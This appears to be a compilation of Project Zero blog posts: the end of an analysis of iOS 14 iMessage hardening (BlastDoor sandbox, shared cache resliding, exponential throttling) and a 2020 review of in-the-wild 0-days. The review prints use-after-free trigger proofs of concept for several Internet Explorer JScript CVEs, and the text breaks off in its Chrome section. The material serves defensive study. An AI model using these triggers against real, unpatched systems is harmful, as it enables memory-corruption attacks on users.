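        r->exists = false; /* the deferred removal has already happened */
    if (!r->exists) {
        r->exists = true;
        r->slide = fresh_slide;
    }
    r->refcount++;
    return r->slide;
}
```

A restart inside the 120-second window hands back the same slide, which is what a crash oracle needs; once restarts are spaced further apart than that (for example by exponential throttling, after its delay grows past two minutes), each restart gets a new region.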

As a result, a third-party app could still be attacked through a crash-oracle technique if it automatically sends some form of delivery receipt to the sender and restarts quickly enough after a crash. This could, however, be prevented for example by enabling ExponentialThrottling for these services. Ideally, and assuming that the performance penalty is reasonable, Apple would enable re-randomization for all apps in the future.

Exponential Throttling

Another thing we suggested back in 2019 was to limit the number of attempts an attacker gets when attempting to exploit a vulnerability. This was mostly important to defend against the crash-oracle technique, but would also help to prevent brute force attacks (e.g., given enough attempts, one could simply brute force the location of the shared cache region). The new ExponentialThrottling feature in launchd seems to achieve just that.

To use it, a system daemon or agent has to opt in by setting “_ExponentialThrottling = 1” in its Info.plist (essentially the service metadata), as can be seen below for the BlastDoor service:

> plutil -p /System/Library/PrivateFrameworks/MessagesBlastDoorSupport.framework/Versions/A/XPCServices/MessagesBlastDoorService.xpc/Contents/Info.plist


  "CFBundleDisplayName" => "MessagesBlastDoorService"

  "CFBundleExecutable" => "MessagesBlastDoorService"

  "CFBundleIdentifier" => ""


  "XPCService" => {

    "_ExponentialThrottling" => 1



Apart from the BlastDoor service, it is also used for imagent:

> plutil -p /System/Library/LaunchAgents/


  "_ExponentialThrottling" => 1


but doesn’t appear to be used for any other service, as can, for example, be seen in the output of the launchctl dumpstate command, which shows “exponential throttling = 1” only for these two services.

Presumably, the _ExponentialThrottling property instructs launchd (the macOS and iOS init process) to delay subsequent restarts of a crashing service. While it is somewhat challenging to statically reverse engineer launchd due to the lack of source code or binary symbols, it is fortunately fairly easy to experimentally determine the impact of the _ExponentialThrottling property, for example by installing a custom daemon that writes the current timestamp to a file before crashing. By default, that is, without ExponentialThrottling, one would see the following:

Service started on Wed Jan  6 13:56:03 2021

Service started on Wed Jan  6 13:56:13 2021

Service started on Wed Jan  6 13:56:23 2021

Service started on Wed Jan  6 13:56:33 2021
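The test daemon used for this experiment is not included in the post; a minimal C sketch of what such a daemon could look like is shown below. It appends a line in the same “Service started on ...” format (ctime() produces exactly this date layout) and then calls abort() so that launchd, with KeepAlive set, restarts it. The function names and the log path are hypothetical; a real daemon would call test_daemon_main() from its main() with a path of your choosing.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

/* Append one "Service started on <date>" line. ctime() yields the
 * "Wed Jan  6 13:56:03 2021\n" layout seen in the log, newline included.
 * Returns 0 on success, -1 on failure. */
static int log_service_start(FILE *log, time_t now) {
    const char *stamp = ctime(&now);
    if (stamp == NULL)
        return -1;
    size_t len = strlen(stamp);
    if (fputs("Service started on ", log) == EOF || fwrite(stamp, 1, len, log) != len)
        return -1;
    return fflush(log) == 0 ? 0 : -1;
}

/* Hypothetical daemon body: record the start, then crash on purpose so that
 * launchd (KeepAlive) restarts the service and the next line is appended. */
void test_daemon_main(const char *log_path) {
    FILE *log = fopen(log_path, "a");
    if (log != NULL) {
        log_service_start(log, time(NULL));
        fclose(log);
    }
    abort();
}
```

The gap between consecutive lines in the resulting file is then the restart delay that launchd applied.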

As can be seen, by default, a service is, at the earliest, restarted ten seconds after it was previously started. However, using the following service plist which enables ExponentialThrottling:

> # Start service with

> # launchctl bootstrap system /Library/LaunchDaemons/net.saelo.test.plist

> plutil -p /Library/LaunchDaemons/net.saelo.test.plist
{
  "_ExponentialThrottling" => 1
  "KeepAlive" => 1
  "Label" => "net.saelo.test"
  "POSIXSpawnType" => "Interactive"
  "Program" => "/path/to/program"
}

One can observe the following:

Service started on Wed Jan  6 10:42:43 2021

Service started on Wed Jan  6 10:42:53 2021 (+10s)

Service started on Wed Jan  6 10:43:03 2021 (+10s)

Service started on Wed Jan  6 10:43:13 2021 (+10s)

Service started on Wed Jan  6 10:43:33 2021 (+20s)

Service started on Wed Jan  6 10:44:13 2021 (+40s)

Service started on Wed Jan  6 10:45:33 2021 (+80s)

Service started on Wed Jan  6 10:48:13 2021 (+160s [~2.5m])

Service started on Wed Jan  6 10:53:33 2021 (+320s [~5m])

Service started on Wed Jan  6 11:04:13 2021 (+640s [~10m])

Service started on Wed Jan  6 11:24:13 2021 (+20m)

Service started on Wed Jan  6 11:44:13 2021 (+20m)

Service started on Wed Jan  6 12:04:13 2021 (+20m)

Here, the exponential increase in the time between subsequent restarts is clearly visible, and goes up to an apparent maximum of 20 minutes. And indeed, launchd does contain the following bit of code in a function presumably responsible for computing the next restart delay (search for XREFs to the string "%s: service throttled by %llu seconds"):

  if ( delay >= 1200 )
    result = 1200LL;                 // 20 minutes
  else
    result = delay;

With this change, an exploit that relied on brute force would now only get one attempt every 20 minutes instead of every 10 seconds.
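The restart gaps in the log above can be reproduced by a simple model: three restarts at the 10-second base delay, then doubling, clamped at 1200 seconds as in the decompiled code. This is a fit to the observed timestamps under that assumption, not launchd's actual algorithm; in particular, the number of unthrottled restarts is inferred from a single run.

```c
#include <stdint.h>

#define BASE_DELAY_SECS      10   /* default restart interval seen above */
#define MAX_DELAY_SECS       1200 /* clamp from the decompiled launchd code */
#define UNTHROTTLED_RESTARTS 3    /* inferred from a single observed run */

/* Delay in seconds before the n-th restart (n >= 1), fitted to the log:
 * three restarts at the base delay, then doubling up to the 20-minute cap. */
static uint64_t restart_delay(unsigned n) {
    uint64_t delay = BASE_DELAY_SECS;
    if (n <= UNTHROTTLED_RESTARTS)
        return delay;
    for (unsigned i = 0; i < n - UNTHROTTLED_RESTARTS && delay < MAX_DELAY_SECS; i++)
        delay *= 2;
    /* Same clamp as the decompiled snippet: if (delay >= 1200) result = 1200. */
    return delay >= MAX_DELAY_SECS ? MAX_DELAY_SECS : delay;
}
```

In steady state, the cap leaves 86400 / 1200 = 72 attempts per day, compared to 86400 / 10 = 8640 with the default ten-second delay.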

(Upcoming?) ObjectiveC ISA PAC

The PoC exploit against iMessage on iOS 12.4 relied heavily on faking ObjectiveC objects to gain a form of arbitrary code execution despite the presence of pointer authentication (PAC). This was mainly possible because the ISA field, containing the pointer to the Class object and thus making a piece of memory appear like a valid ObjectiveC object, was not protected through PAC and could thus be faked. With iOS 14, this now seems to be changing: while previously, the top 19 bits of the ISA value contained the inline refcount, it now appears that this field has been reduced to 9 bits (of which the LSB appears to be reserved for some purpose, leaving an 8-bit inline refcount, see the bit shifting logic in objc_release or objc_retain), while the freed-up bits now hold a PAC, as can be seen in objc_rootAllocWithZone in libobjc.dylib:

    ; Allocate the object

    BL              j__calloc_3

    CBZ             X0, loc_1953DA434

    MOV             X8, X0

    ; “Tag” the address with a constant to get a PAC modifier value

    MOVK            X8, #0x6AE1,LSL#48        

    MOV             X9, X19

    ; Compute PAC of Class pointer with tagged object address as modifier

    PACDA           X9, X8

    ; Clear top 9 bits (inline refcnt) and bottom 3 bits (other bitfields)       

    AND             X8, X9, #0x7FFFFFFFFFFFF8

    ; Set LSB and inline refcount to one

    MOV             X9, #0x100000000000001

    ORR             X9, X8, X9

    ; Presumably, the refcnt isn’t used for all types of classes...

    TST             W20, #0x2000

    CSEL            X8, X9, X8, EQ

    ; Store the resulting value into the ISA field

    STR             X8, [X0]

However, the ISA PAC currently appears never to be checked; as such, it doesn’t yet affect any exploits. The most likely reason for this is that the ISA PAC feature is being rolled out in multiple phases, with the current implementation meant to allow in-depth performance evaluation, in particular of the reduced size of the inline refcount, which will likely cause more objects to use the more expensive out-of-line refcounting (used once the inline refcount saturates). With that, it can be expected that, in the absence of major performance issues, future releases of iOS and macOS will use PAC for the ObjC ISA field, thus likely breaking exploits that have to rely on faking ObjectiveC objects to achieve arbitrary code execution.
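To make the bit manipulation in the objc_rootAllocWithZone listing easier to follow, here is a C sketch of the same computation. PACDA itself cannot be reproduced in portable C, so the function takes an already-signed class pointer as input. The constants are copied from the disassembly, while the meaning of the 0x2000 flag and the refcount layout (bits 56 to 63, with bit 55 reserved) follow the reading given in the text above and should be treated as assumptions.

```c
#include <stdint.h>

#define ISA_PAC_DISCRIMINATOR 0x6AE1ULL             /* MOVK X8, #0x6AE1, LSL#48 */
#define ISA_KEEP_MASK         0x007FFFFFFFFFFFF8ULL /* AND mask: keeps bits 3..54 */
#define ISA_INIT_BITS         0x0100000000000001ULL /* LSB set, inline refcount = 1 */
#define ISA_FLAG_NO_REFCNT    0x2000u               /* TST W20, #0x2000 (meaning assumed) */

/* PACDA modifier: the object address with bits 48..63 replaced by the constant. */
static uint64_t isa_pac_modifier(uint64_t obj_addr) {
    return (obj_addr & 0x0000FFFFFFFFFFFFULL) | (ISA_PAC_DISCRIMINATOR << 48);
}

/* Build the ISA word from an already-signed class pointer (the PACDA output). */
static uint64_t isa_compose(uint64_t signed_cls, uint32_t flags) {
    uint64_t isa = signed_cls & ISA_KEEP_MASK; /* clear top 9 and bottom 3 bits */
    if ((flags & ISA_FLAG_NO_REFCNT) == 0)     /* CSEL ..., EQ: bit clear */
        isa |= ISA_INIT_BITS;
    return isa;
}

/* Inline refcount under the assumed layout: the top 8 bits. */
static unsigned isa_inline_refcount(uint64_t isa) {
    return (unsigned)(isa >> 56);
}
```

For a signed pointer of 0x123456789ABCDEF7, the mask leaves 0x003456789ABCDEF0 and the OR produces 0x013456789ABCDEF1, i.e. an inline refcount of one with the LSB set.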


This blog post discussed three improvements in iOS 14 affecting iMessage security: the BlastDoor service, resliding of the shared cache, and exponential throttling. Overall, these changes are probably very close to the best that could’ve been done given the need for backwards compatibility, and they should have a significant impact on the security of iMessage and the platform as a whole. It’s great to see Apple putting aside the resources for these kinds of large refactorings to improve end users’ security. Furthermore, these changes also highlight the value of offensive security work: not just single bugs were fixed, but instead structural improvements were made based on insights gained from exploit development work.

As for the alleged NSO iMessage exploit, it may have been prevented from working against iOS 14 by any of the following:

  • The bug was fixed in iOS 14, for example due to the rewrite of large parts of the iMessage processing pipeline in Swift
  • The mere fact that processing happens in a different process, which could for example break a heap layouting primitive
  • The shared cache resliding would break their exploit if their exploit relied on some form of crash oracle to break ASLR
  • The stronger sandbox of the BlastDoor service, which could prevent the exploitation of a privilege escalation vulnerability after compromising the BlastDoor process

While these are some possible scenarios, and it could be the case that the exploit “just” needs some re-engineering to function again, the fact that these security improvements were shipped is certainly a positive outcome.

Attachment 1:

;;; This profile contains the rules necessary to make BlastDoor as close to

;;; compute-only as possible, while still remaining functional.


;;; For all platforms: /System/Library/PrivateFrameworks/MessagesBlastDoorSupport.framework/XPCServices/MessagesBlastDoorService.xpc/MessagesBlastDoorService

(version 1)

;;; -------------------------------------------------------------------------------------------- ;;;

;;; Basic Rules

;;; -------------------------------------------------------------------------------------------- ;;;

;; Deny all default rules.

(deny default)

(deny file-map-executable process-info* nvram*)

(deny dynamic-code-generation)

;; Rules copied from Ones that we've deemed overly permissive

;; or unnecessary for BlastDoor have been removed.

;; Allow read access to standard system paths.

(allow file-read*

       (require-all (file-mode #o0004)

                    (require-any (subpath "/System")

                                 (subpath "/usr/lib")

                                 (subpath "/usr/share")

                                 (subpath "/private/var/db/dyld"))))

(allow file-map-executable

       (subpath "/System/Library/CoreServices/RawCamera.bundle")

       (subpath "/usr/lib")

       (subpath "/System/Library/Frameworks"))

(allow file-test-existence (subpath "/System"))

(allow file-read-metadata

       (literal "/etc")

       (literal "/tmp")

       (literal "/var")

       (literal "/private/etc/localtime"))

;; Allow access to standard special files.

(allow file-read*

       (literal "/dev/random")

       (literal "/dev/urandom"))

(allow file-read* file-write-data

       (literal "/dev/null")

       (literal "/dev/zero"))

(allow file-read* file-write-data file-ioctl

       (literal "/dev/dtracehelper"))

;; TODO: Don't allow core dumps to be written out unless this is on a dev

;; fused device?

(allow file-write*

       (require-all (regex #"^/cores/")

                    (require-not (file-mode 0))))

;; Allow IPC to standard system agents.

(allow mach-lookup

       (global-name "")

       (global-name "")

       (global-name "")

       (global-name "")

       (global-name ""))

;; Allow mostly harmless operations.

(allow signal process-info-dirtycontrol process-info-pidinfo

       (target self))

;; Temporarily allow sysctl-read with reporting to see if this is

;; used for anything.

(allow (with report) sysctl-read)

;; We don't need to post any darwin notifications.

(deny darwin-notification-post)

;; We shouldn't allow any other file operations not covered under

;; the default of deny above.

(deny file-clone file-link)

;; Don't deny file-test-existence: <rdar://problem/59611011>

;; (deny file-test-existence)

;; Don't allow access to any IOKit properties.

(deny iokit-get-properties)

(deny mach-cross-domain-lookup)

;; Don't allow BlastDoor to spawn any other XPC services other than

;; ones that we can intentionally whitelist later.

(deny mach-lookup (xpc-service-name-regex #".*"))

;; Don't allow any commands on sockets.

(deny socket-ioctl)

;; Denying this should have no ill effects for our use case.

(deny system-privilege)

;; To be uncommented once the system call whitelist is complete...

;; (deny syscall-unix (with send-signal SIGKILL))

(allow syscall-unix

       (syscall-number SYS_exit)

       (syscall-number SYS_kevent_qos)

       (syscall-number SYS_kevent_id)

       (syscall-number SYS_thread_selfid)

       (syscall-number SYS_bsdthread_ctl)

       (syscall-number SYS_kdebug_trace64)

       (syscall-number SYS_getattrlist)

       (syscall-number SYS_sigsuspend_nocancel)

       (syscall-number SYS_proc_info)


       (syscall-number SYS___disable_threadsignal)

       (syscall-number SYS___pthread_sigmask)

       (syscall-number SYS___mac_syscall)

       (syscall-number SYS___semwait_signal_nocancel)

       (syscall-number SYS_abort_with_payload)

       (syscall-number SYS_access)

       (syscall-number SYS_bsdthread_create)

       (syscall-number SYS_bsdthread_terminate)

       (syscall-number SYS_close)

       (syscall-number SYS_close_nocancel)

       (syscall-number SYS_connect)

       (syscall-number SYS_csops_audittoken)

       (syscall-number SYS_csrctl)

       (syscall-number SYS_fcntl)

       (syscall-number SYS_fsgetpath)

       (syscall-number SYS_fstat64)

       (syscall-number SYS_fstatfs64)

       (syscall-number SYS_getdirentries64)

       (syscall-number SYS_geteuid)

       (syscall-number SYS_getfsstat64)

       (syscall-number SYS_getgid)

       (syscall-number SYS_getrlimit)

       (syscall-number SYS_getuid)

       (syscall-number SYS_ioctl)

       (syscall-number SYS_issetugid)

       (syscall-number SYS_lstat64)

       (syscall-number SYS_madvise)

       (syscall-number SYS_mmap)

       (syscall-number SYS_munmap)

       (syscall-number SYS_mprotect)

       (syscall-number SYS_mremap_encrypted)

       (syscall-number SYS_open)

       (syscall-number SYS_open_nocancel)

       (syscall-number SYS_openat)

       (syscall-number SYS_pathconf)

       (syscall-number SYS_pread)

       (syscall-number SYS_read)

       (syscall-number SYS_readlink)

       (syscall-number SYS_shm_open)

       (syscall-number SYS_socket)

       (syscall-number SYS_stat64)

       (syscall-number SYS_statfs64)

       (syscall-number SYS_sysctl)

       (syscall-number SYS_sysctlbyname)

       (syscall-number SYS_workq_kernreturn)

       (syscall-number SYS_workq_open))


;; Still allow the system call but report in log.

(allow (with report) syscall-unix)

;; For validating the entitlements of clients. This is so only entitled

;; clients can pass data into a BlastDoor instance.

(allow process-info-codesignature)

;;; -------------------------------------------------------------------------------------------- ;;;

;;; Reading Files

;;; -------------------------------------------------------------------------------------------- ;;;

;; Support for BlastDoor receiving sandbox extensions from clients to either read files, or

;; write to a target location.


(allow file-read*

       (extension ""))


(allow file-read* file-write*

       (extension ""))

Déjà vu-lnerability

A Year in Review of 0-days Exploited In-The-Wild in 2020

Posted by Maddie Stone, Project Zero

2020 was a year full of 0-day exploits. Many of the Internet’s most popular browsers had their moment in the spotlight. Memory corruption is still the name of the game and how the vast majority of detected 0-days are getting in. While we tried new methods of 0-day detection with modest success, 2020 showed us that there is still a long way to go in detecting these 0-day exploits in-the-wild. But what may be the most notable fact is that 25% of the 0-days detected in 2020 are closely related to previously publicly disclosed vulnerabilities. In other words, 1 out of every 4 detected 0-day exploits could potentially have been avoided if a more thorough investigation and patching effort had been made. Across the industry, incomplete patches — patches that don’t correctly and comprehensively fix the root cause of a vulnerability — allow attackers to use 0-days against users with less effort.

Since mid-2019, Project Zero has dedicated an effort specifically to track, analyze, and learn from 0-days that are actively exploited in-the-wild. For the last 6 years, Project Zero’s mission has been to “make 0-day hard”. From that came the goal of our in-the-wild program: “Learn from 0-days exploited in-the-wild in order to make 0-day hard.” In order to ensure our work is actually making it harder to exploit 0-days, we need to understand how 0-days are actually being used. Continuously pushing forward the public’s understanding of 0-day exploitation is only helpful when it doesn’t diverge from the “private state-of-the-art”, what attackers are doing and are capable of.

Over the last 18 months, we’ve learned a lot about the active exploitation of 0-days and our work has matured and evolved with it. For the 2nd year in a row, we’re publishing a “Year in Review” report of the previous year’s detected 0-day exploits. The goal of this report is not to detail each individual exploit, but instead to analyze the exploits from the year as a group, looking for trends, gaps, lessons learned, successes, etc. If you’re interested in each individual exploit’s analysis, please check out our root cause analyses.

When looking at the 24 0-days detected in-the-wild in 2020, there’s an undeniable conclusion: increasing investment in correct and comprehensive patches is a huge opportunity for our industry to impact attackers using 0-days. 

A correct patch is one that fixes a bug with complete accuracy, meaning the patch no longer allows any exploitation of the vulnerability. A comprehensive patch applies that fix everywhere that it needs to be applied, covering all of the variants. We consider a patch to be complete only when it is both correct and comprehensive. When exploiting a single vulnerability or bug, there are often multiple ways to trigger the vulnerability, or multiple paths to access it. Many times we’re seeing vendors block only the path that is shown in the proof-of-concept or exploit sample, rather than fixing the vulnerability as a whole, which would block all of the paths. Similarly, security researchers are often reporting bugs without following up on how the patch works and exploring related attacks.

While the idea that incomplete patches are making it easier for attackers to exploit 0-days may be uncomfortable, the converse of this conclusion can give us hope. We have a clear path toward making 0-days harder. If more vulnerabilities are patched correctly and comprehensively, it will be harder for attackers to exploit 0-days.

This vulnerability looks familiar 🤔

As stated in the introduction, 2020 included 0-day exploits that are similar to ones we’ve seen before. 6 of 24 0-day exploits detected in-the-wild are closely related to publicly disclosed vulnerabilities. Some of these 0-day exploits only had to change a line or two of code to have a new working 0-day exploit. This section explains how each of these 6 actively exploited 0-days is related to a previously seen vulnerability. We’re taking the time to detail each and show the minimal differences between the vulnerabilities to demonstrate that once you understand one of the vulnerabilities, it’s much easier to then exploit another.


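Vulnerability exploited in-the-wild | Variant of...
Microsoft Internet Explorer CVE-2020-0674 | CVE-2018-8653*, CVE-2019-1367*, CVE-2019-1429*
Mozilla Firefox CVE-2020-6820 | Mozilla Bug 1507180
Google Chrome CVE-2020-6572 | CVE-2019-5870, CVE-2019-13695
Microsoft Windows CVE-2020-0986 | CVE-2019-0880*
Google Chrome/Freetype CVE-2020-15999 | CVE-2014-9665
Apple Safari CVE-2020-27930 | CVE-2015-0993

* vulnerability was also exploited in-the-wild in previous years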


Internet Explorer JScript CVE-2020-0674

CVE-2020-0674 is the fourth vulnerability in this bug class to be exploited in 2 years. The other three vulnerabilities are CVE-2018-8653, CVE-2019-1367, and CVE-2019-1429. In the 2019 year-in-review we devoted a section to these vulnerabilities. Google’s Threat Analysis Group attributed all four exploits to the same threat actor. It bears repeating: the same actor exploited similar vulnerabilities four separate times. For all four exploits, the attacker used the same vulnerability type and the same exact exploitation method. Fixing these vulnerabilities comprehensively the first time would have caused attackers to work harder or find new 0-days.

JScript is the legacy JavaScript engine in Internet Explorer. Although it is legacy, it is still enabled by default in Internet Explorer 11, which is a built-in feature of Windows 10 computers. The bug class, or type of vulnerability, is that a specific JScript object, a variable (which uses the VAR struct), is not tracked by the garbage collector. I’ve included the code to trigger each of the four vulnerabilities below to demonstrate how similar they are. Ivan Fratric from Project Zero wrote all of the included code that triggers the four vulnerabilities.
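To make the bug class concrete, here is a toy model written for this post (it is not JScript’s collector and not one of Ivan’s triggers). A mark-and-sweep collector frees every slot it cannot reach from its roots, so a variable held only in an untracked temporary, such as a callback’s "this" or its arguments, gets freed while the callback is still using it. `ToyHeap` and `CallbackSeesFreedSlot` are hypothetical names.

```cpp
#include <cassert>
#include <cstddef>
#include <vector>

// Toy model only (hypothetical, not JScript's collector): a heap of
// variable slots plus the set of roots the collector knows about.
struct ToyHeap {
    std::vector<bool> live;          // live[i] stays true while slot i is allocated
    std::vector<std::size_t> roots;  // slots registered with the collector

    std::size_t Alloc() {
        live.push_back(true);
        return live.size() - 1;
    }

    // Mark phase: this toy has no object graph, so only rooted slots are marked.
    // Sweep phase: every unmarked slot is freed.
    void Collect() {
        std::vector<bool> marked(live.size(), false);
        for (std::size_t r : roots) marked[r] = true;
        for (std::size_t i = 0; i < live.size(); ++i) {
            if (!marked[i]) live[i] = false;
        }
    }
};

// Models a callback that receives a variable (for example "this" or an
// argument) held only in an untracked temporary. If the callback triggers
// a collection, that temporary now names a freed slot.
// Returns true when the callback is left holding a dangling reference.
bool CallbackSeesFreedSlot(bool track_argument) {
    ToyHeap heap;
    std::size_t arg = heap.Alloc();
    if (track_argument) heap.roots.push_back(arg);  // the fix: report it as a root
    heap.Collect();                                  // e.g. CollectGarbage() inside the callback
    return !heap.live[arg];
}
```

`CallbackSeesFreedSlot(false)` returns true because the untracked argument is swept, while rooting the argument lets it survive. In this model, each JScript patch corresponds to registering one more kind of variable as a root, which is why fixing one path left the others open.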


In December 2018, it was discovered that CVE-2018-8653 was being actively exploited. In this vulnerability, the "this" variable is not tracked by the garbage collector in the isPrototypeOf callback. McAfee also wrote a write-up going through each step of this exploit.

var objs = new Array();
var refs = new Array();
var dummyObj = new Object();

function getFreeRef()
{
  // 5. delete prototype objects as well as ordinary objects
  for ( var i = 0; i < 10000; i++ ) {
    objs[i] = 1;
  }
  for ( var i = 0; i < 200; i++ )
  {
    refs[i].prototype = 1;
  }

  // 6. Garbage collector frees unused variable blocks.
  // This includes the one holding the "this" variable
  CollectGarbage();

  // 7. Boom: any use of "this" from here on touches the freed variable
}

// 1. create "special" objects for which isPrototypeOf can be invoked
for ( var i = 0; i < 200; i++ ) {
        var arr = new Array({ prototype: {} });
        var e = new Enumerator(arr);
        refs[i] = e.item();
}

// 2. create a bunch of ordinary objects
for ( var i = 0; i < 10000; i++ ) {
        objs[i] = new Object();
}

// 3. create objects to serve as prototypes and set up callbacks
for ( var i = 0; i < 200; i++ ) {
        refs[i].prototype = {};
        refs[i].prototype.isPrototypeOf = getFreeRef;
}

// 4. calls isPrototypeOf. This sets up refs[100].prototype as "this" variable
// During callback, the "this" variable won't be tracked by the Garbage collector
// use different index if this doesn't work
dummyObj instanceof refs[100];


In September 2019, CVE-2019-1367 was detected as exploited in-the-wild. This is the same vulnerability type as CVE-2018-8653: a JScript variable object is not tracked by the garbage collector. This time, though, the untracked variables are the ones in the arguments array in the Array.sort callback.

var spray = new Array();

function F() {
    // 2. Create a bunch of objects
    for (var i = 0; i < 20000; i++) spray[i] = new Object();
    // 3. Store a reference to one of them in the arguments array
    //    The arguments array isn't tracked by garbage collector
    arguments[0] = spray[5000];
    // 4. Delete the objects and call the garbage collector
    //    All JScript variables get reclaimed...
    for (var i = 0; i < 20000; i++) spray[i] = 1;
    CollectGarbage();
    // 5. But we still have reference to one of them in the
    //    arguments array
    alert(arguments[0]);
}

// 1. Call sort with a custom callback
[1,2].sort(F);

The CVE-2019-1367 patch did not actually fix the vulnerability triggered by the proof-of-concept above and exploited in-the-wild. The proof-of-concept for CVE-2019-1367 still worked even after the CVE-2019-1367 patch was applied!

In November 2019, Microsoft released another patch to address this gap. CVE-2019-1429 addressed the shortcomings of the CVE-2019-1367 patch and also fixed a variant, in which the variables in the arguments array are not tracked by the garbage collector in the toJSON callback rather than the Array.sort callback. The only difference between the two triggers is the lines marked with + and - below: instead of calling the Array.sort callback, we call the toJSON callback.

var spray = new Array();

function F() {
    // 2. Create a bunch of objects
    for (var i = 0; i < 20000; i++) spray[i] = new Object();
    // 3. Store a reference to one of them in the arguments array
    //    The arguments array isn't tracked by garbage collector
    arguments[0] = spray[5000];
    // 4. Delete the objects and call the garbage collector
    //    All JScript variables get reclaimed...
    for (var i = 0; i < 20000; i++) spray[i] = 1;
    CollectGarbage();
    // 5. But we still have reference to one of them in the
    //    arguments array
    alert(arguments[0]);
}

+  // 1. Cause toJSON callback to fire
+  var o = {toJSON:F}
+  JSON.stringify(o);
-  // 1. Call sort with a custom callback
-  [1,2].sort(F);


In January 2020, CVE-2020-0674 was detected as exploited in-the-wild. The vulnerability is that the named arguments are not tracked by the garbage collector in the Array.sort callback. The only change required to the trigger for CVE-2019-1367 is to replace the references to arguments[] with one of the arguments named in the function definition. For example, we replaced any instances of arguments[0] with arg1.

var spray = new Array();

+  function F(arg1, arg2) {
-  function F() {
    // 2. Create a bunch of objects
    for (var i = 0; i < 20000; i++) spray[i] = new Object();
    // 3. Store a reference to one of them in one of the named arguments
    //    The named arguments aren't tracked by garbage collector
+    arg1 = spray[5000];
-    arguments[0] = spray[5000];
    // 4. Delete the objects and call the garbage collector
    //    All JScript variables get reclaimed...
    for (var i = 0; i < 20000; i++) spray[i] = 1;
    CollectGarbage();
    // 5. But we still have reference to one of them in
    //    a named argument
+    alert(arg1);
-    alert(arguments[0]);
}

// 1. Call sort with a custom callback
[1,2].sort(F);



Unfortunately, CVE-2020-0674 was not the end of this story, even though it was the fourth vulnerability of this type to be exploited in-the-wild. In April 2020, Microsoft patched CVE-2020-0968, another Internet Explorer JScript vulnerability. When the bulletin was first released, it was designated as exploited in-the-wild, but the following day, Microsoft changed this field to say it was not exploited in-the-wild (see the revisions section at the bottom of the advisory). The trigger for CVE-2020-0968 is below.

var spray = new Array();

function f1() {
  alert('callback 1');
  return spray[6000];
}

function f2() {
  alert('callback 2');
  spray = null;
  CollectGarbage();
  return 'a';
}

function boom() {
  var e = o1;
  var d = o2;
  // 3. the first callback (e.toString) happens
  //    it returns one of the string variables
  //    which is stored in a temporary variable
  //    on the stack, not tracked by garbage collector
  // 4. Second callback (d.toString) happens
  //    There, string variables get freed
  //    and the space reclaimed
  // 5. Crash happens when attempting to access
  //    string content of the temporary variable
  var b = e + d;
}

// 1. create two objects with toString callbacks
var o1 = { toString: f1 };
var o2 = { toString: f2 };

// 2. create a bunch of string variables
for (var a = 0; a < 20000; a++) {
  spray[a] = "aaa";
}

boom();


In addition to the vulnerabilities themselves being very similar, the attacker used the same exploit method for each of the four 0-day exploits. This provided a type of “plug and play” quality to their 0-day development which would have reduced the amount of work required for each new 0-day exploit.

Firefox CVE-2020-6820

Mozilla patched CVE-2020-6820 in Firefox with an out-of-band security update in April 2020. It is a use-after-free in the Cache subsystem.

CVE-2020-6820 is a use-after-free of the CacheStreamControlParent when closing its last open read stream. The read stream is the response returned to the content process from a cache query. If the close or abort command is received while any read streams are still open, it triggers StreamList::CloseAll. If the StreamControl still has ReadStreams when StreamList::CloseAll is called, the CacheStreamControlParent is freed. (The StreamControl must be the Parent, which lives in the browser process, to get the use-after-free in the browser process; the Child would only provide one in the renderer.) The mId member of the CacheStreamControlParent is then accessed, causing the use-after-free.

The execution path for CVE-2020-6820 is:

StreamList::CloseAll ← Patched function
  …
        For each stream:
          …
                          If StreamList is empty && mStreamControl:
                             …
                             Send__delete(this) ← FREED HERE!
    PCacheStreamControlParent::SendCloseAll ← Used here in call to Id()
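The underlying pattern is a method call that can free the object it was invoked on, followed by a read of one of that object’s members (here, the call to Id() reading mId). Below is a sketch of one common defensive idiom: holding a strong reference across the call (Gecko code often calls this a "kungFuDeathGrip"). It uses `std::shared_ptr` as a stand-in for Gecko’s reference counting, every name is hypothetical, and it is not necessarily how Mozilla fixed this bug.

```cpp
#include <cassert>
#include <map>
#include <memory>

// Hypothetical model, not Mozilla's code: a registry owns each actor, and
// a method on the actor can make the registry drop it (the analogue of
// Send__delete(this)). Reading a member afterwards is a use-after-free
// unless the caller holds its own strong reference across the call.
struct Actor {
    int mId;
    explicit Actor(int id) : mId(id) {}
    void CloseAll();
};

std::map<int, std::shared_ptr<Actor>> g_registry;

// Closing the last stream removes the registry's (possibly last) reference.
void Actor::CloseAll() {
    int id = mId;          // copy first: erase() may destroy *this
    g_registry.erase(id);
}

int CloseAllAndReadId(int id) {
    // Strong reference ("death grip") held for the whole call. Without it,
    // grip->mId below would read freed memory once CloseAll() returns.
    std::shared_ptr<Actor> grip = g_registry.at(id);
    grip->CloseAll();
    return grip->mId;  // safe: grip keeps the Actor alive until we return
}
```

After `CloseAllAndReadId(7)` returns, the registry no longer holds actor 7 and the actor is destroyed when `grip` goes out of scope, after the last member access rather than before it.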

CVE-2020-6820 is a variant of an internally found Mozilla vulnerability, Bug 1507180. Bug 1507180 was discovered in November 2018 and patched in December 2019. It is a use-after-free of the ReadStream in mReadStreamList in StreamList::CloseAll. Although it was patched in December 2019, an explanatory comment for why the patch was needed was only added in early March 2020.

For Bug 1507180, the execution path was the same as for CVE-2020-6820, except that the use-after-free occurred earlier, in StreamControl::CloseAllReadStreams, rather than a few calls “higher” in StreamList::CloseAll.

Personally, I have doubts about whether this vulnerability was actually exploited in-the-wild. As far as we know, no one (including myself or Mozilla engineers [1, 2]) has found a way to trigger this vulnerability without shutting down the process. Therefore, exploiting this vulnerability doesn’t seem very practical. However, because it was marked as exploited in-the-wild in the advisory, it remains in our in-the-wild tracking spreadsheet and is thus included in this list.

Chrome for Android CVE-2020-6572

CVE-2020-6572 is a use-after-free in MediaCodecAudioDecoder::~MediaCodecAudioDecoder(). This is Android-specific code that uses Android's media decoding APIs to support playback of DRM-protected media on Android. The root cause of this use-after-free is that a `unique_ptr` is reassigned, so the object it previously owned can be deleted, while a raw pointer into that originally referenced object isn't updated.

